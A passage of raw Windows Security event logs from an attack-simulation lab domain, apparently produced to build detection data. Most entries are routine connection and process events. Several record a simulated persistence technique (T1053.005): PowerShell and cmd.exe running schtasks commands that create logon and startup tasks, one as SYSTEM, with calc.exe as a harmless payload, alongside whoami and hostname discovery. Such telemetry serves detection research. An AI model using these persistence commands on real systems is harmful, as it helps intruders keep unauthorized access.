Filter Run-Time ID: 67255
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278904
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1108
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53917
Destination Address: 69.192.193.125
Destination Port: 80
Protocol: 6
Filter Information:
Filter Run-Time ID: 67255
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278903
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1108
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53916
Destination Address: 69.192.193.125
Destination Port: 80
Protocol: 6
Filter Information:
Filter Run-Time ID: 67255
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278902
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1108
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53915
Destination Address: 52.247.37.26
Destination Port: 80
Protocol: 6
Filter Information:
Filter Run-Time ID: 67255
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278901
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 50088
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278900
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 50088
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278899
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 50088
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278898
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1108
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53914
Destination Address: 69.192.193.125
Destination Port: 80
Protocol: 6
Filter Information:
Filter Run-Time ID: 67255
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278897
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 61629
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278896
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 61629
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278895
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 61629
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887274
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0xd8
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Exit Status: 0x1
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887273
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 50088
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887272
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887271
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 61629
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278924
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0xfa4
Process Name: C:\Windows\System32\cmd.exe
Exit Status: 0x0
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278923
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x1e68
Process Name: C:\Windows\System32\schtasks.exe
Exit Status: 0x0
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4698
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Other Object Access Events
OpCode=Info
RecordNumber=278922
Keywords=Audit Success
Message=A scheduled task was created.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Task Information:
Task Name: \T1053_005_OnStartup
Task Content:
2021-04-19T18:27:52
WIN-HOST-5\Administrator
\T1053_005_OnStartup
2021-04-19T18:27:00
true
IgnoreNew
true
true
true
false
false
PT10M
PT1H
true
false
true
true
false
false
false
PT72H
7
cmd.exe
/c calc.exe
S-1-5-18
LeastPrivilege
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278921
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1e68
New Process Name: C:\Windows\System32\schtasks.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0xfa4
Creator Process Name: C:\Windows\System32\cmd.exe
Process Command Line: schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278920
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x175c
Process Name: C:\Windows\System32\schtasks.exe
Exit Status: 0x0
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4698
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Other Object Access Events
OpCode=Info
RecordNumber=278919
Keywords=Audit Success
Message=A scheduled task was created.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Task Information:
Task Name: \T1053_005_OnLogon
Task Content:
2021-04-19T18:27:52
WIN-HOST-5\Administrator
\T1053_005_OnLogon
2021-04-19T18:27:00
true
IgnoreNew
true
true
true
false
false
PT10M
PT1H
true
false
true
true
false
false
false
PT72H
7
cmd.exe
/c calc.exe
WIN-HOST-5\Administrator
InteractiveToken
LeastPrivilege
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278918
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x175c
New Process Name: C:\Windows\System32\schtasks.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0xfa4
Creator Process Name: C:\Windows\System32\cmd.exe
Process Command Line: schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278917
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xfa4
New Process Name: C:\Windows\System32\cmd.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x19c4
Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: "C:\Windows\system32\cmd.exe" /c "schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" & schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe""
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278916
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53446
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278915
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 53446
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278914
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 53446
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278913
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x1d0c
Process Name: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Exit Status: 0x0
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278912
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0xd60
Process Name: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Exit Status: 0x0
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278911
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd60
New Process Name: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x1d0c
Creator Process Name: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Process Command Line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\2\RES531A.tmp" "c:\Users\Administrator\AppData\Local\Temp\2\qupsc0xs\CSC166760C2EA504DE3806803781F21433.TMP"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278910
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1d0c
New Process Name: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x19c4
Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2\qupsc0xs\qupsc0xs.cmdline"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278909
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x1e54
Process Name: C:\Windows\System32\whoami.exe
Exit Status: 0x0
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278908
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1e54
New Process Name: C:\Windows\System32\whoami.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x19c4
Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: "C:\Windows\system32\whoami.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278907
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x560
Process Name: C:\Windows\System32\HOSTNAME.EXE
Exit Status: 0x0
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278906
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x560
New Process Name: C:\Windows\System32\HOSTNAME.EXE
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x19c4
Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: "C:\Windows\system32\HOSTNAME.EXE"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887278
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 53902
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887277
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 53446
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887276
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x189c
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Exit Status: 0x1
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887275
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x189c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:53 PM
LogName=Security
